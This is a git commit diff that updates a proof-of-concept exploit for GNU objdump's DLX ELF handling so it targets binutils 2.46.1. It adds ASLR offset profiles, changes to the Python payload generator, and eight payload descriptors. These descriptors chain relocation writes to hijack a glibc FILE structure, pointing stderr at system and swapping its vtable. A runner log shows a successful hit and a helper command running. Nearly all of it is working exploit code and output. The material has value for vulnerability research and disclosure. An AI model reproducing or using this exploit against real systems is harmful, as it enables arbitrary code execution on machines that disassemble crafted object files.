Update objdump DLX PoC for binutils 2.46.1
This commit is contained in:
@@ -10,6 +10,14 @@ Tested against a binutils-gdb master build from commit:
|
|||||||
c311f4d37f31ff3fbb5db6923abcdf93bb75a37b
|
c311f4d37f31ff3fbb5db6923abcdf93bb75a37b
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Also validated against the official GNU Binutils 2.46.1 release tarball with a
|
||||||
|
clean `dlx-elf` objdump build:
|
||||||
|
|
||||||
|
```text
|
||||||
|
GNU objdump (GNU Binutils) 2.46.1
|
||||||
|
elf32-dlx
|
||||||
|
```
|
||||||
|
|
||||||
## whats in here
|
## whats in here
|
||||||
|
|
||||||
- `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump`
|
- `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump`
|
||||||
@@ -27,18 +35,32 @@ The payload files are named `.bin` because they are raw binary files, but the fi
|
|||||||
|
|
||||||
ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing.
|
ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing.
|
||||||
|
|
||||||
The generator emits the original profile plus a WSL/Ubuntu 24.04 profile measured against the pinned `dlx-elf` build. The second profile keeps ASLR on but uses stable relative offsets observed in the target process:
|
The generator emits the original profile, a WSL/Ubuntu 24.04 profile measured
|
||||||
|
against the pinned `dlx-elf` build, and a profile measured against a clean GNU
|
||||||
|
Binutils 2.46.1 `dlx-elf` build. The profiles keep ASLR on but use stable
|
||||||
|
relative offsets observed in the target process:
|
||||||
|
|
||||||
```text
|
```text
|
||||||
layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
buf_delta=0x702fff00 or 0x6f300000
|
buf_delta=0x702fff00 or 0x6f300000
|
||||||
system_delta=0x7042e500 or 0x7043e4ff
|
system_delta=0x7042e500 or 0x7043e4ff
|
||||||
|
|
||||||
|
layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40
|
||||||
|
buf_delta=0x702fff00 or 0x6f300000
|
||||||
|
system_delta=0x7042e500 or 0x7043e4ff
|
||||||
```
|
```
|
||||||
|
|
||||||
That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop.
|
That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop.
|
||||||
|
|
||||||
More detail is in `docs/aslr-bypass-analysis.md`.
|
More detail is in `docs/aslr-bypass-analysis.md`.
|
||||||
|
|
||||||
|
The `gnu2461` profile was validated with the existing runner:
|
||||||
|
|
||||||
|
```text
|
||||||
|
HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin
|
||||||
|
CALC_HELPER_RAN 2026-06-25T11:14:27Z
|
||||||
|
```
|
||||||
|
|
||||||
So a plain crash like this does not always mean the PoC failed:
|
So a plain crash like this does not always mean the PoC failed:
|
||||||
|
|
||||||
```text
|
```text
|
||||||
|
|||||||
@@ -14,6 +14,8 @@ The current generator emits:
|
|||||||
- `orig`: the first measured profile.
|
- `orig`: the first measured profile.
|
||||||
- `wsl2404`: offsets measured against the pinned `dlx-elf` build on
|
- `wsl2404`: offsets measured against the pinned `dlx-elf` build on
|
||||||
WSL/Ubuntu 24.04.
|
WSL/Ubuntu 24.04.
|
||||||
|
- `gnu2461`: offsets measured against a clean GNU Binutils 2.46.1 `dlx-elf`
|
||||||
|
objdump build.
|
||||||
|
|
||||||
The `wsl2404` profile uses:
|
The `wsl2404` profile uses:
|
||||||
|
|
||||||
@@ -25,6 +27,22 @@ buf_delta=0x702fff00 or 0x6f300000
|
|||||||
system_delta=0x7042e500 or 0x7043e4ff
|
system_delta=0x7042e500 or 0x7043e4ff
|
||||||
```
|
```
|
||||||
|
|
||||||
|
The `gnu2461` profile uses:
|
||||||
|
|
||||||
|
```text
|
||||||
|
off_io=-0x3690
|
||||||
|
off_sec=0xbb8
|
||||||
|
sec_size_offset=0x40
|
||||||
|
rbase=0x190
|
||||||
|
buf_delta=0x702fff00 or 0x6f300000
|
||||||
|
system_delta=0x7042e500 or 0x7043e4ff
|
||||||
|
```
|
||||||
|
|
||||||
|
The 2.46.1 profile differs because the relocation cache array moved from
|
||||||
|
`data+0x220` to `data+0x190`, the BFD section object moved from `data+0xbb0`
|
||||||
|
to `data+0xbb8`, and the `bfd_section.size` field used to widen generic
|
||||||
|
relocation range checks is at section offset `0x40`.
|
||||||
|
|
||||||
## Why argv two-stage is not enough
|
## Why argv two-stage is not enough
|
||||||
|
|
||||||
A deterministic leak-then-exploit route would need this sequence in one
|
A deterministic leak-then-exploit route would need this sequence in one
|
||||||
|
|||||||
@@ -36,6 +36,7 @@ LAYOUTS = (
|
|||||||
"name": "orig",
|
"name": "orig",
|
||||||
"off_io": OFF_IO,
|
"off_io": OFF_IO,
|
||||||
"off_sec": OFF_SEC,
|
"off_sec": OFF_SEC,
|
||||||
|
"sec_size_offset": 0x38,
|
||||||
"rbase": RBASE,
|
"rbase": RBASE,
|
||||||
"buf_deltas": BUF_TO_FILE_BE32_DELTAS,
|
"buf_deltas": BUF_TO_FILE_BE32_DELTAS,
|
||||||
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
|
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
|
||||||
@@ -45,11 +46,22 @@ LAYOUTS = (
|
|||||||
"name": "wsl2404",
|
"name": "wsl2404",
|
||||||
"off_io": -0x3690,
|
"off_io": -0x3690,
|
||||||
"off_sec": 0xBB0,
|
"off_sec": 0xBB0,
|
||||||
|
"sec_size_offset": 0x38,
|
||||||
"rbase": 0x220,
|
"rbase": 0x220,
|
||||||
"buf_deltas": (0x702FFF00, 0x6F300000),
|
"buf_deltas": (0x702FFF00, 0x6F300000),
|
||||||
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
|
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
|
||||||
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
|
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
|
||||||
},
|
},
|
||||||
|
{
|
||||||
|
"name": "gnu2461",
|
||||||
|
"off_io": -0x3690,
|
||||||
|
"off_sec": 0xBB8,
|
||||||
|
"sec_size_offset": 0x40,
|
||||||
|
"rbase": 0x190,
|
||||||
|
"buf_deltas": (0x702FFF00, 0x6F300000),
|
||||||
|
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
|
||||||
|
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
|
||||||
|
},
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@@ -85,8 +97,8 @@ def build(out_dir):
|
|||||||
file_system_slot = off_io + 0x68
|
file_system_slot = off_io + 0x68
|
||||||
file_wide_data = off_io + 0xA0
|
file_wide_data = off_io + 0xA0
|
||||||
file_vtable = off_io + 0xD8
|
file_vtable = off_io + 0xD8
|
||||||
section_size_low = off_sec + 0x38
|
section_size_low = off_sec + layout["sec_size_offset"]
|
||||||
section_size_high = off_sec + 0x3C
|
section_size_high = section_size_low + 4
|
||||||
|
|
||||||
for flag_byte4 in (0x05, 0x06):
|
for flag_byte4 in (0x05, 0x06):
|
||||||
for buf_delta in layout["buf_deltas"]:
|
for buf_delta in layout["buf_deltas"]:
|
||||||
@@ -131,6 +143,7 @@ def build(out_dir):
|
|||||||
f"system_delta=0x{system_delta:08x}",
|
f"system_delta=0x{system_delta:08x}",
|
||||||
"command=P",
|
"command=P",
|
||||||
f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}",
|
f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}",
|
||||||
|
f"sec_size_offset={layout['sec_size_offset']:#x}",
|
||||||
"",
|
"",
|
||||||
]
|
]
|
||||||
+ [
|
+ [
|
||||||
|
|||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x05
|
||||||
|
buf_delta=0x6f300000
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7042e500
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x05
|
||||||
|
buf_delta=0x6f300000
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7043e4ff
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x05
|
||||||
|
buf_delta=0x702fff00
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7042e500
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x05
|
||||||
|
buf_delta=0x702fff00
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7043e4ff
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x06
|
||||||
|
buf_delta=0x6f300000
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7042e500
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x06
|
||||||
|
buf_delta=0x6f300000
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7043e4ff
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x06
|
||||||
|
buf_delta=0x702fff00
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7042e500
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
Binary file not shown.
@@ -0,0 +1,34 @@
|
|||||||
|
layout=gnu2461
|
||||||
|
flag_byte4=0x06
|
||||||
|
buf_delta=0x702fff00
|
||||||
|
wide_delta=0x4fff0000
|
||||||
|
system_delta=0x7043e4ff
|
||||||
|
command=P
|
||||||
|
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
|
||||||
|
sec_size_offset=0x40
|
||||||
|
|
||||||
|
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
|
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
|
||||||
|
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
|
||||||
|
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
|
||||||
|
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
|
||||||
|
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
|
||||||
|
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
|
||||||
|
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
|
||||||
|
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
|
||||||
|
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
|
||||||
|
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
|
||||||
|
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
|
||||||
|
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
|
||||||
|
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
|
||||||
|
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
|
||||||
|
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
|
||||||
|
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
|
||||||
|
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
|
||||||
|
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
|
||||||
|
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
|
||||||
|
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
|
||||||
|
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
|
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
|
||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
